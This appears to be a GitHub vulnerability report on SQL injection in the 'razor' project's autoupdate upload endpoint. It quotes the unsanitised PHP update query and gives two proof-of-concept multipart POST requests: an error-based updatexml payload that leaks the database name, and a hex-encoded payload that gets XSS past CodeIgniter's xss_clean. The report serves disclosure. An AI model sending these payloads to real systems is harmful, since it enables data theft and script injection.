You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date'
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date' where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
POC(assume there exists a product with an ID of 1):
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"
1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
XSS can also be triggered through manipulated error messages.
Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"
1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--
The text was updated successfully, but these errors were encountered:
Hi, I want to report a SQLi vulnerability.
In
razor/web/application/controllers/manage/autoupdate.php
Line 187 in 2c991af
$description
is controlled by users and has few restrictions on its format.In
ChannelModel::updateapk
method,$decrption
is inserted into SQL directly.razor/web/application/models/channelmodel.php
Line 482 in 2c991af
POC(assume there exists a product with an ID of 1):
XSS can also be triggered through manipulated error messages.
Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
The text was updated successfully, but these errors were encountered: